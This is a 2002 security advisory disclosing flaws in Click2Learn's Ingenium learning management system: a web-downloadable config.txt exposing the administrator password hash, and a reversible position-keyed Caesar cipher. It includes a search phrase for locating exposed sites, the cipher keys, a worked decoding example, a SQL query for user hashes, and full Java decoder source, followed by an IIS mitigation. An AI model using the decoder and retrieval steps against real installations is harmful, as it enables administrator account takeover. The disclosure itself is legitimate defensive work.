The vendor was contacted, but I have not received any response (other
than an autoresponder) over the past week...
-E
Security Advisory -- Click2Learn's Ingenium LMS
Brian Enigma <enigma@netninja.com>
http://netninja.com/papers/ingenium/
-----------------------
OVERVIEW
-----------------------
Product: Ingenium Learning Management System
Versions: Known to work on v5.1 and v6.1. It is likely
that all versions are vulnerable. Click2Learn's
Aspen LMS has not been tested.
Vulnerabilities: (1) Administrator password, public visibility
(2) All user passwords visible with database SELECT
access
Affected Systems: All Ingenium installations visible to the public
internet (do a Google search for "Ingenium Web
Connect")
Reporter: Brian Enigma <enigma@netninja.com>
Vendor Contacted: 2002-10-07, no response
Publication Date: 2002-10-14
Company: Click2Learn
Company URL: http://home.click2learn.com/
-----------------------
BACKGROUND
-----------------------
I work for a company that uses Click2Learn's Ingenium Learning Management
System. Part of my job involves locating, evaluating, and fixing security
vulnerabilities in an assortment of products. A few things about Ingenium have
recently caught my interest. First, a user on the public internet can retrieve
the administrator's password hash. Second, the password hash is easily
reversible. Third, user passwords (not as easily accessible, as they are
stored in a Microsoft SQL database) are also hashed using the same reversible
algorithm.
-----------------------
SEVERITY
-----------------------
This is a very serious problem. Any site using Ingenium as their learning
management system is vulnerable. Since the HTML title used by the frameset in
all Ingenium installations is "Ingenium Web Connect," a Google search will
reveal quite a number of vulnerable sites. In theory, a user can log into any
of these sites as an administrator using these vulnerabilities.
-----------------------
ADMINISTRATOR PASSWORD HASH VISIBILITY
-----------------------
Ingenium stores a number of configuration parameters in a Microsoft SQL
database. It also must store a few values on the local system, as it needs to
know several important values before being able to access the database--for
instance, the location, login, and password for connecting to the database.
Basically this is the database "bootstrap" information. In examining the file
more closely (it is called [install directory]/config/config.txt), I also noted
that the application's administrator password, as a hashed value, is also
stored in this file. Even further inspection of the file location, directory
structure, and IIS installation shows that the file is located in a folder
under the htdocs web directory! This means that a simple HTTP request can grab
the config file!
In most default installations, replacing the "default.asp" file name in the
URL, when looking at the Ingenium home page, with "config/config.txt" will
retrieve the file, including the administrator password hash. This is just
plain silly! Most web programmers with any amount of training or experience
know that you need to store your data out-of-band from the documents/programs.
Raw data files should not be web accessible.
While this particular vulnerability is a known issue (see Click2Learn's
Knowledge Base article Q1254), it is brushed off as advice for the paranoid.
Personal observation has not shown a single site that hides this configuration
file. Utilizing this vulnerability leads us to the importance of the next one.
-----------------------
ADMINISTRATOR PASSWORD HASH DECRYPTION
-----------------------
You may or my not already know that the best way to store passwords in a
persistent data store is with a one-way hash function. In fact, this is how
all Unix systems work. You cannot reverse out a password from a password hash
without a lot of brute force--in most cases, so much number crunching that the
process is not worth it. You may also know that one of the worst ways to store
passwords (or any data) is with XOR "encryption." Two large enough samples and
a minute of math will give you a pretty darn good idea of what the "encryption"
key is. An even less secure method of encrypting data is with a secret decoder
ring. In fact, most newspapers have a "Cryptogram" section with the Sunday
comics that lets you solve these as a diversion (shameless self-plug:
http://sourceforge.net/projects/cryptoslam/). It is called a Caesar cypher and
is made mildly more challenging/annoying by varying the offset depending on the
position of the letter in the message.
I'll give you three guesses what Ingenium uses to store passwords, but the
first two guesses cannot be "Caesar Cypher." Yes, Ingenium uses about the same
encryption as a Flash Gordon Secret Decoder Ring. Implementation would have
been an exercise left for the reader, but it was a slow Friday, so the Java
source will be supplied with this advisory. Passwords are not case
sensitive--it would appear they are converted to uppercase before being
"encrypted." The example code will only decode letters and numbers, no special
symbols, but the theory still applies.
In this particular cipher implementation, the key is:
9'$%100'%6
This key repeats if the plaintext is longer than ten characters. To decode a
given piece of cyphertext, you simply take the hex value of the cyphertext
character and subtract the hex value of the key character in the same position,
giving you a plaintext hex characters. Note that the number space wraps
between 0x20 and 0x7D. Just in case you are not following, an example is in
order. Let us say, as an example, that the password line in config.txt is
"General\LocalAdmin=|smh|#'hp{9'$%10". The decoding goes something like this:
cypher: |smh|#'hp{9'$%10
subtract key: 9'$%100'%69'$%10
You will note that only the first ten characters are significant. The rest are
nulls in the plaintext, giving the cyphertext character the same value as the
key character at that position. Worked out in hex, this becomes:
cipher: 7c 73 6d 68 7c 23 27 68 70 7b
subtract key: 39 27 24 25 31 30 30 27 25 36
-----------------------------
equals: 43 4c 49 43 4b 51 55 41 4b 45
in ASCII: C L I C K Q U A K E
You will notice that the "Q" and "U" wrapped down below 0x20, and back around
to 0x7D. Experimentation also shows that the numeric digits are somehow offset
such that zero (normally 0c30) is mapped to lowercase n (0x6E). Symbols are
also mapped into this area, but have not been completely explored.
-----------------------
USER PASSWORD HASH VISIBILITY
-----------------------
This issue is not as severe as the administrator password. A user will need
SELECT access in the database to utilize this vulnerability. A simple SELECT *
FROM IWC_USR will give you a list of logins and their corresponding password
hashes. The password hash employs the same algorithm as above, only you will
need to remove the "$" at the beginning of the password hash and use a slightly
different key (the characters "i0)'0+7/" repeated).
-----------------------
SOLUTION
-----------------------
A good long-term solution would be a software update from Click2Learn that
moves the files in the "config" directory (and possible others) to a path
outside of the web documents. This requires engineering time and QA resources.
Also, this solution may not apply to entities that purchased the Ingenium LMS
without a support contract.
A simple and immediate solution would be to block the config.txt file from
being downloadable. Configuring IIS to block access to this directory can
achieve the desired result. This is a simple operation. First, open the
Internet Management console. Next locate the "config" web folder. Right-click
on it and select "Properties." Uncheck the "Read" and "Index" checkboxes and
click "OK."
-= QED =-
import javax.swing.JOptionPane;
/**
* IngeniumDecoder
* Simple program to decode the admin password hash present in the Ingenium
* LMS config.txt file. This file is stored within the htdocs directory
* tree, so is available through a simple URL. For instance, if your
* Ingenium install is in http://suffolk.click2learn.com/suffolk_test/, then
* the config file is located at
* http://suffolk.click2learn.com/suffolk_test/config/config.txt. The same
* password hashing scheme is used both for the "administrator" login account
* and the SQL database DSN password.
*
* @author Brian Enigma <enigma@netninja.com>
*/
public class IngeniumDecoder {
/** The low end of the keyspace */
public static int WRAP_BOTTOM = 0x20; // space
/** The high end of the keyspace */
public static int WRAP_TOP = 0x7E; // close curley brace
public static int CHAR_ZERO = 0x6E;
/** The symmetric key */
public static String KEY = "9'$%100'%6";
/**
* Given some cyphertext, produce the plaintext. The encryption method
* employed is a simple Caesar cypher with a key that rotates depending
* on the position of the character in the plaintext/cyphertext. The
* offset is determined by the KEY string above. (This is similar to
* obfuscation using ROT-13 coding, only the "13" changes by position.)
*
*@param s the cyphertext
*@return the plaintext
*/
public static String decode(String s) {
StringBuffer result = new StringBuffer();
int max = s.length();
for (int i=0; i<max; i++) {
int cypherLetter = (int) s.charAt(i);
int keyLetter = (int) KEY.charAt(i % KEY.length());
if (cypherLetter == keyLetter)
continue;
int decodeLetter = cypherLetter - keyLetter;
if (decodeLetter < WRAP_BOTTOM)
decodeLetter = WRAP_TOP - (WRAP_BOTTOM - decodeLetter);
if ((decodeLetter >= CHAR_ZERO) && (decodeLetter <= CHAR_ZERO+10))
result.append(decodeLetter - CHAR_ZERO + Character.getNumericValue('0'));
else if ((decodeLetter >= WRAP_BOTTOM) && (decodeLetter <= WRAP_TOP))
result.append(Character.toString((char) decodeLetter));
else
result.append("[unknown letter]");
}
return result.toString();
}
/** Creates a new instance of IngeniumDecoder */
private IngeniumDecoder() {
}
public static void main(String[] argv) {
//System.out.println(decode("|smh|#'hp{9'$%10"));
String hashedPass = JOptionPane.showInputDialog(
null,
"Please enter the \"hashed\" admin password from config.txt",
"Enter hash",
JOptionPane.QUESTION_MESSAGE);
if ((hashedPass != null) && (hashedPass.length() > 0))
JOptionPane.showMessageDialog(
null,
"The decoded password is " + decode(hashedPass),
"Plaintext",
JOptionPane.INFORMATION_MESSAGE);
System.exit(0);
}
}
